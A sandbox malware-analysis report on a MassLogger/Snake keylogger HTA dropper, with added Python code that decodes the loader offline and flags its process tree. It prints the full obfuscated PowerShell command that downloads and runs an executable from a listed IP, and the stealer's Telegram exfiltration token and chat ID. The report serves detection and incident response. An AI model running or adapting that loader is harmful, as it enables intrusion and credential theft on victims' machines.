

Windows Analysis Report
needagoodplanforsuccesstogetbackbest.hta

Overview

General Information

Sample name: needagoodplanforsuccesstogetbackbest.hta
Analysis ID: 1640151
MD5: 151ebe266eb058faf3a2a749fc6c918a
SHA1: 6c7e0493b004fb0d48a72a6fd7fac0dd1843daf4
SHA256: ea7cb3e80587b9322c9985ea5318728a0fb4fa9a25304a1f0a944d39b65bfa20
Tags: hta, MassLogger, user-abuse_ch

Detection

Cobalt Strike, MSIL Logger, MassLogger RAT
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected Cobalt Strike Beacon
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected MSIL Logger
Yara detected MassLogger RAT
Yara detected Powershell decode and execute
Yara detected Telegram RAT
.NET source code references suspicious native API functions
Binary is likely a compiled AutoIt script file
Contains functionality to log keystrokes (.Net Source)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Suspicious MSHTA Child Process
Suspicious command line found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 6964 cmdline: mshta.exe "C:\Users\user\Desktop\needagoodplanforsuccesstogetbackbest.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 5064 cmdline: "C:\Windows\system32\cmd.exe" "/C POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'JEdhICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlcmRFRmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ1dRaXBNREdkcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamdrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFaXpjTUh2dkJaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVEdORG9HcUNLRyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWR1ZhbyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMjAvY3Nvc3MuZXhlIiwiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtzVGFyVC1zbEVFcCgzKTtJblZvS0UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[cHar]0x22+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5308 cmdline: POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'JEdhICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlcmRFRmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ1dRaXBNREdkcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamdrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFaXpjTUh2dkJaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVEdORG9HcUNLRyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWR1ZhbyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMjAvY3Nvc3MuZXhlIiwiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtzVGFyVC1zbEVFcCgzKTtJblZvS0UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[cHar]0x22+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 6844 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 4932 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC5CF.tmp" "c:\Users\user\AppData\Local\Temp\43swuu3x\CSC1706E7A7601C443B9125CD5A3AB1B1B7.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • csoss.exe (PID: 6740 cmdline: "C:\Users\user\AppData\Roaming\csoss.exe" MD5: 54DE0C8E192E7BC71B6D284FFF136296)
          • RegSvcs.exe (PID: 5484 cmdline: "C:\Users\user\AppData\Roaming\csoss.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
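The powershell.exe command line above (PID 5308) is two layers deep: a '+'-joined mix of single-quoted literals and [cHAr]N casts is handed to the inner IEX, which rebuilds a [Convert]::FromBase64String() call, and the outer iEx runs whatever that returns. The Python below is an added example, not part of the Joe Sandbox report or of the sample, that resolves both layers offline and extracts the indicators a responder wants (P/Invoked DLL and API, download URL, drop path, follow-on cmdlets). The command line is embedded exactly as the process tree prints it; the blob as printed ends in a lone "=" after a complete base64 group, which strict decoders reject, so the helper repairs padding before decoding.

```python
"""Offline decoder for the two-layer PowerShell loader in this report.

Layer 1: '+'-joined literals and [char]N casts evaluated by the inner IEX,
         producing "[System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(...))".
Layer 2: the base64 blob inside that call; its decoded text is the script the outer iEx runs.
"""
import base64
import re

# Command line of powershell.exe (PID 5308) as printed in the report's process tree
# (the trailing double quote belongs to cmd.exe's /C argument).
LOADER_CMDLINE = r'''POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'JEdhICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlcmRFRmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ1dRaXBNREdkcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamdrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFaXpjTUh2dkJaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVEdORG9HcUNLRyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWR1ZhbyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMjAvY3Nvc3MuZXhlIiwiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtzVGFyVC1zbEVFcCgzKTtJblZvS0UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[cHar]0x22+'))')))"'''

# One concatenation operand: a single-quoted literal or a [char]N cast (decimal or 0x hex).
# Case-insensitive because the sample randomises the case of every token.
_OPERAND = re.compile(r"'([^']*)'|\[char\]\s*(0x[0-9a-f]+|\d+)", re.IGNORECASE)


def resolve_concat(expr: str) -> str:
    """Evaluate the string-concatenation expression without running PowerShell."""
    out = []
    for literal, number in _OPERAND.findall(expr):
        out.append(chr(int(number, 0)) if number else literal)   # int(..., 0) accepts 0x prefixes
    return "".join(out)


def b64_to_text(blob: str) -> str:
    """Base64-decode with padding repaired (this blob carries a stray trailing '=')."""
    blob = blob.strip().rstrip("=")
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-8")


def decode_loader(cmdline: str) -> dict:
    # Layer 1: the argument of the inner IEX inside iEx($(IEX( ... ))).
    m = re.search(r"iex\(\$\(iex\((.+?)\)\)\)", cmdline, re.IGNORECASE | re.DOTALL)
    layer1 = resolve_concat(m.group(1) if m else cmdline)
    # Layer 2: the base64 argument of the rebuilt FromBase64String() call.
    blob = re.search(r'frombase64string\(\s*"([A-Za-z0-9+/=]+)"', layer1, re.IGNORECASE).group(1)
    script = re.sub(r"[ \t]+", " ", b64_to_text(blob))   # collapse the space padding
    # Indicators worth pulling out of the final script.
    return {
        "layer1": layer1,
        "script": script,
        "dll": re.search(r'DllImport\("([^"]+)"', script).group(1),
        "api": re.search(r"extern\s+\w+\s+(\w+)\s*\(", script).group(1),
        "url": re.search(r"https?://[^\s\"']+", script).group(0),
        "drop_path": re.search(r"\$env:\w+\\[^\"']+", script, re.IGNORECASE).group(0),
        "cmdlets": sorted({c.lower() for c in re.findall(
            r"\b(add-type|start-sleep|invoke-item)\b", script, re.IGNORECASE)}),
    }


if __name__ == "__main__":
    for key, value in decode_loader(LOADER_CMDLINE).items():
        print(f"{key}: {value}")
```

The decoded script is an Add-Type P/Invoke of urlmon!URLDownloadToFile that fetches http://23.95.235.28/120/csoss.exe into %APPDATA%\csoss.exe, sleeps three seconds and runs it with Invoke-Item, which is exactly the csc.exe, cvtres.exe and csoss.exe children seen in the tree. The same approach (resolve the concatenation, then decode) works on other loaders built from the same obfuscator, which is why the decoder does not hard-code this sample's token order.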
Extracted malware configuration (MassLogger, Telegram exfiltration): {"EXfil Mode": "Telegram", "Telegram Token": "7598843355:AAHehybWWiULdkPS1RLFstdr4_yw-SdkoII", "Telegram Chatid": "7668947425"}
Source | Rule | Description | Author
00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security
00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_MSILLogger | Yara detected MSIL Logger | Joe Security
00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  Strings:
  • 0xefdf:$a1: get_encryptedPassword
  • 0xf307:$a2: get_encryptedUsername
  • 0xed7a:$a3: get_timePasswordChanged
  • 0xee9b:$a4: get_passwordField
  • 0xeff5:$a5: set_encryptedPassword
  • 0x10951:$a7: get_logins
  • 0x10602:$a8: GetOutlookPasswords
  • 0x103f4:$a9: StartKeylogger
  • 0x108a1:$a10: KeyLoggerEventArgs
  • 0x10451:$a11: KeyLoggerEventArgsEventHandler
(5 of 17 entries shown)
Source | Rule | Description | Author
6.2.csoss.exe.eb0000.1.unpack | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security
6.2.csoss.exe.eb0000.1.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
6.2.csoss.exe.eb0000.1.unpack | JoeSecurity_MSILLogger | Yara detected MSIL Logger | Joe Security
6.2.csoss.exe.eb0000.1.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
6.2.csoss.exe.eb0000.1.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  Strings:
  • 0xd3df:$a1: get_encryptedPassword
  • 0xd707:$a2: get_encryptedUsername
  • 0xd17a:$a3: get_timePasswordChanged
  • 0xd29b:$a4: get_passwordField
  • 0xd3f5:$a5: set_encryptedPassword
  • 0xed51:$a7: get_logins
  • 0xea02:$a8: GetOutlookPasswords
  • 0xe7f4:$a9: StartKeylogger
  • 0xeca1:$a10: KeyLoggerEventArgs
  • 0xe851:$a11: KeyLoggerEventArgsEventHandler
(5 of 13 entries shown)
Source | Rule | Description | Author
amsi32_5308.amsi.csv | JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security

                    System Summary

Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\system32\cmd.exe" "/C POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'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'+[cHar]0x22+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'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
Source: Process started | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) | Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'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'+[cHar]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5308, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.cmdline", ProcessId: 6844, ProcessName: csc.exe
Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5308, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\csoss[1].exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5308, TargetFilename: C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.cmdline
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'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'+[cHar]0x22+'))')))", CommandLine: POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'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
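The Sigma matches above all fire on process-creation telemetry (parent/child image, command line, file writes). As an added example that is not part of the Joe Sandbox report and is not the Sigma rules' own YAML, the Python below implements simplified versions of those checks plus an image/command-line mismatch check for the RegSvcs.exe stage (the report's "Creates a process in suspended mode" and "Writes to foreign memory regions" signatures), and runs them over events reconstructed from this report's process tree. The System32 paths for mshta.exe and cmd.exe are assumed from their command lines, and long arguments the rules do not need are shortened to "...".

```python
"""Simplified process-creation rules in the spirit of the Sigma matches in this
report, run over events reconstructed from the report's process tree."""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the started executable (NewProcessName)
    cmdline: str    # command line as logged


# Reconstructed sample telemetry: PIDs, parents and command lines as printed in the report.
# mshta.exe/cmd.exe image paths are assumed; "..." marks arguments shortened for brevity.
EVENTS = [
    ProcEvent(6964, 0, r"C:\Windows\System32\mshta.exe",
              r'mshta.exe "C:\Users\user\Desktop\needagoodplanforsuccesstogetbackbest.hta"'),
    ProcEvent(5064, 6964, r"C:\Windows\System32\cmd.exe",
              r'"C:\Windows\system32\cmd.exe" "/C POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX(...)))"'),
    ProcEvent(4508, 5064, r"C:\Windows\System32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(5308, 5064, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r"POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX(...)))"),
    ProcEvent(6844, 5308, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.cmdline"'),
    ProcEvent(4932, 6844, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe",
              r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ..."),
    ProcEvent(6740, 5308, r"C:\Users\user\AppData\Roaming\csoss.exe",
              r'"C:\Users\user\AppData\Roaming\csoss.exe"'),
    ProcEvent(5484, 6740, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
              r'"C:\Users\user\AppData\Roaming\csoss.exe"'),
]

MSHTA_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe"}
COMPILERS = {"csc.exe", "vbc.exe"}
PS_TOKEN = re.compile(r"powershell", re.IGNORECASE)
PS_NORMAL_CASINGS = {"powershell", "PowerShell", "Powershell", "POWERSHELL"}
PS_FLAGS = [                                              # any two of these together is enough
    re.compile(r"-e\w*\s+bypass", re.IGNORECASE),         # -ExecutionPolicy Bypass and short forms
    re.compile(r"-nop\b", re.IGNORECASE),                 # -NoProfile
    re.compile(r"-w(indowstyle)?\s+(1|hidden)\b", re.IGNORECASE),
    re.compile(r"\biex\b", re.IGNORECASE),                # Invoke-Expression alias
]
USER_WRITABLE = re.compile(r"\\AppData\\(Roaming|Local\\Temp)\\", re.IGNORECASE)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def first_token(cmdline):
    """Executable as it appears at the start of the command line (quoted or not)."""
    s = cmdline.lstrip()
    if s.startswith('"'):
        return s[1:].split('"', 1)[0]
    return s.split(None, 1)[0] if s else ""


def run_rules(events):
    """Return {pid: set(rule names)} for every event that tripped at least one rule."""
    by_pid = {e.pid: e for e in events}
    alerts = defaultdict(set)
    for e in events:
        parent = by_pid.get(e.ppid)
        pimg = basename(parent.image) if parent else ""
        img = basename(e.image)
        if pimg == "mshta.exe" and img in MSHTA_CHILDREN:
            alerts[e.pid].add("mshta_child_process")
        if pimg == "powershell.exe" and img in COMPILERS:
            alerts[e.pid].add("powershell_dynamic_compilation_csc")
        if any(m.group(0) not in PS_NORMAL_CASINGS for m in PS_TOKEN.finditer(e.cmdline)):
            alerts[e.pid].add("powershell_case_anomaly")
        if sum(bool(p.search(e.cmdline)) for p in PS_FLAGS) >= 2:
            alerts[e.pid].add("suspicious_powershell_flags")
        if USER_WRITABLE.search(e.image):
            alerts[e.pid].add("exec_from_user_writable")
        tok = first_token(e.cmdline)
        if tok and basename(tok) != img:      # hollowed host: image is RegSvcs.exe, cmdline says csoss.exe
            alerts[e.pid].add("image_cmdline_mismatch")
    return dict(alerts)


if __name__ == "__main__":
    for pid, rules in sorted(run_rules(EVENTS).items()):
        print(pid, sorted(rules))
```

The case-anomaly and flag checks are deliberately written against the raw command line rather than a normalised one, because the whole point of the sample's random casing is to slip past exact-string rules; the mismatch check is the cheapest telemetry-only signal for the RegSvcs.exe injection that the Yara hits on process 7 confirm.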

                    Data Obfuscation

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'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'+[cHar]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5308, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.cmdline", ProcessId: 6844, ProcessName: csc.exe
Suricata alerts:
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-17T01:19:05.711080+0100 | 2022050 | 1 | A Network Trojan was detected | 23.95.235.28 | 80 | 192.168.2.6 | 49695 | TCP
2025-03-17T01:19:05.855949+0100 | 2022051 | 1 | A Network Trojan was detected | 23.95.235.28 | 80 | 192.168.2.6 | 49695 | TCP
2025-03-17T01:19:12.426210+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49696 | 158.101.44.242 | 80 | TCP



                    AV Detection

Source: C:\Users\user\AppData\Roaming\csoss.exe | Avira: detection malicious, Label: TR/AD.SnakeStealer.ergur
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\csoss[1].exe | Avira: detection malicious, Label: TR/AD.SnakeStealer.ergur
